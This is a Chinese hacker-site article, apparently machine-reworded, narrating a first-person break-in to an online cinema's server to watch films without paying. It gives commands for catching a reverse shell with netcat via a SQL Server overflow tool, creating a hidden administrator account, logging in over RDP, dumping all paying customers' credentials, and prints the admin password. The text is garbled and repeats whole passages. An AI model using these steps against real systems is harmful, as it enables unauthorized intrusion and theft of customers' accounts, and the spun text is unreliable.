黑客入侵电影院

黑客入侵电影院

入侵渗透hacker2016-08-30 11:26:328702A+A-

近期对网上看电影较为喜欢,因此登陆至某“在线影院”。本认为是免費,殊不知跟我说要账户和PIN码,我可不愿为这一出钱。咋办?先探探路。对我而言,侵入的流程是填满快乐的,它兴奋着我人脑的每一条大脑,要我激动极其。我很喜欢体臭这类思想无拘浪荡的高潮,我很喜欢陶醉列举。它是黑客营人的風格。因此,X-Scan开使任劳任怨地跑在了我的桌面上。

 

  打门:时间深处的上溢道具

  用X-Scan对该站名的Server扫面結果下来,开的网关还许多呢:53、80、1433、3389。可并沒有汇报说发觉有弱口今,来看网络管理员算是较为有责任感。但开过3389端口,代表能够远程登录,这但是苹果公司给全部Windows客户奉上的较大的“病毒”。

  仔细观察,我明白了只能在1433端口左右点功夫,想着方法。独往用SQL2上溢道具试一下?

  先开1个cmd对话框,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监视当地99网关。然后该SQL2出马了。再开启1个cmd对话框,输入“sql2 218.147.*.*  61.157.*.*  0”,列举218.147.*.*是另一方IP,61.157.*.*就是你自身的IP,回车后提醒package sent successful。再来过头看一看监视当地网关的netcat,早已变为了C:\WinNT\system32\_,这也是另一方设备的体系我的文档了,来看是完成上溢了,就这么简单。

  我很幸运地获得了另一方的1个Shell,并且還是administrator限权的。接着的使用就驾轻就熟了,加上客户,提高限权:在提示符下输入“net user hacker 12345 /add”(在另一方设备里建立1个名叫hacker,PIN码为12345的客户),再输入“net localgroup administrators hacker /add”(把客户hacker添加到管理人员组),接着就应是3389远程登录了。

  打门:时间深处的上溢道具

  用X-Scan对该站名的Server扫面結果下来,开的网关还许多呢:53、80、1433、3389。可并沒有汇报说发觉有弱口今,来看网络管理员算是较为有责任感。但开过3389端口,代表能够远程登录,这但是苹果公司给全部Windows客户奉上的较大的“病毒”。

  仔细观察,我明白了只能在1433端口左右点功夫,想着方法。独往用SQL2上溢道具试一下?

  先开1个cmd对话框,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监视当地99网关。然后该SQL2出马了。再开启1个cmd对话框,输入“sql2 218.147.*.*  61.157.*.*  0”,列举218.147.*.*是另一方IP,61.157.*.*就是你自身的IP,回车后提醒package sent successful。再来过头看一看监视当地网关的netcat,早已变为了C:\WinNT\system32\_,这也是另一方设备的体系我的文档了,来看是完成上溢了,就这么简单。

  我很幸运地获得了另一方的1个Shell,并且還是administrator限权的。接着的使用就驾轻就熟了,加上客户,提高限权:在提示符下输入“net user hacker 12345 /add”(在另一方设备里建立1个名叫hacker,PIN码为12345的客户),再输入“net localgroup administrators hacker /add”(把客户hacker添加到管理人员组),接着就应是3389远程登录了。

受阻:找寻VOD影片

  最先运作Windows XP内置远程登录器mstsc.exe,填写另一方的IP地址218.147.*.*,明确后在登陆界面添上我刚建立的登录名hacker和PIN码12345,圆满地进到了另一方的Windows 2000主屏幕。

  可接着的状况要我愣住了,这台设备总共就C盘和D盘2个盘,容积加进一块儿也才20GB,这一容积是并不是装进上百部影片的,我想的VOD影片在哪儿?

最先运作Windows XP内置远程登录器mstsc.exe,填写另一方的IP地址218.147.*.*,明确后在登陆界面添上我刚建立的登录名hacker和PIN码12345,圆满地进到了另一方的Windows 2000主屏幕。

  可接着的状况要我愣住了,这台设备总共就C盘和D盘2个盘,容积加进一块儿也才20GB,这一容积是并不是装进上百部影片的,我想的VOD影片在哪儿?

  影片文档必须是放到了另一个每台设备上,而那台设备必须和这台Server是连接网络的。一起,历经我对“在线影院”网页文件的剖析,也确认了这一些:影片文档没有当地,只是依靠MS SQL的引索和分类来无线获取的。这原本也是1个IIS5.0+MS SQL的站名嘛。

  我又多次开启了“可视化工具”,在里边的“DNS”里也发觉了1个全名是“VOD”的连接点,IP偏向了1个与Server相邻的地点,我想找的也是这一“VOD”了。充分考虑Server和VOD中间紧密的通信关联,我很生态地开启了Server的“网上邻居”,果真不出所料,全部组里就两部设备,更是Server和VOD。鼠标点击VOD的标志,该死的体系又提醒键入账户密码,来看网络管理员在“网上邻居”上浏览VOD时沒有储存PIN码,我该到哪去去找PIN码呢?

  胳臂:挖到VOD登陆账户密码

  就在我打算完全舍弃的那一瞬间,脑中忽然闪出1个想法:假如网络管理员他自身要看电视剧咋办呢?方式寒则有二:一要立即在VOD上收看,二也是在server首页上键入他自身的账户密码开展收看。即然方式一如果你无法保持,那麼方式二呢?即使网络管理员是立即在VOD上使用文档,可最少在Server的页面上他应当有个账户用于开展检测之用。

  接着也是在Server这台设备中找账户密码了。不着边际Server的MS SQL数据库。用3389登陆Server,点一下“开使”→“系统”→“Microsoft SQL Server”→“企业管理器”,随后在当今虚拟主机名“Server”下开启“数据表”。发觉1个名叫“web_new”的异常库,应当也是它了!开启它,挑选列举的“表”,右面就列举了这一库里的全部表名,历经观查剖析,锁住了1个名叫“ZH_guanli”的表,先看一下它的內容。键盘右键它,挑选“另存”→“另存全部行”。就那麼一转眼的功夫,Oh,My God,这没有账户是什么啊?全部的付钱客户的账户密码都会这里呢!啧啧啧,过意不去,我Copy了全部的列,随后储存来到我的当地设备中。这种账户的第一位也是admin,应当是网络管理员的了,PIN码为wzl19750529。

  接着擦整洁了“足印”,再次登陆页面,键入网络管理员的账户密码,总算看到影片圆满播发了,获胜!

 

  后记:

  侵入,是1个可深可浅的难题。我的大部分侵入也没有用到很深奥的本事和常识。整个过程关键所在入侵者的构思和剖析,能擅于找到木马病毒和运用木马病毒,找到非常简单合理的侵入方式,这算是黑客之法。也有,非常要提示新手,“侵入”并不一定“毁坏”!大伙儿要掌握好这一度。


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 掩吻猫卆2022-05-28 20:33:58
  • inistrator限权的。接着的使用就驾轻就熟了,加上客户,提高限权:在提示符下输入“net user hacker 12345 /add”(在另一方设备里建立1个名叫hacker,PIN码为12345的客户),再输入“net localgroup administr
  • 痴者珞棠2022-05-29 05:26:14
  • 近期对网上看电影较为喜欢,因此登陆至某“在线影院”。本认为是免費,殊不知跟我说要账户和PIN码,我可不愿为这一出钱。咋办?先探探路。对我而言,侵入的流程是填满快乐的,它兴奋着我人脑的每一条大脑,要我激动极其。我很喜欢体臭这类思想无拘浪荡的高潮,我很喜欢陶醉列举。它是黑客营人的風

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理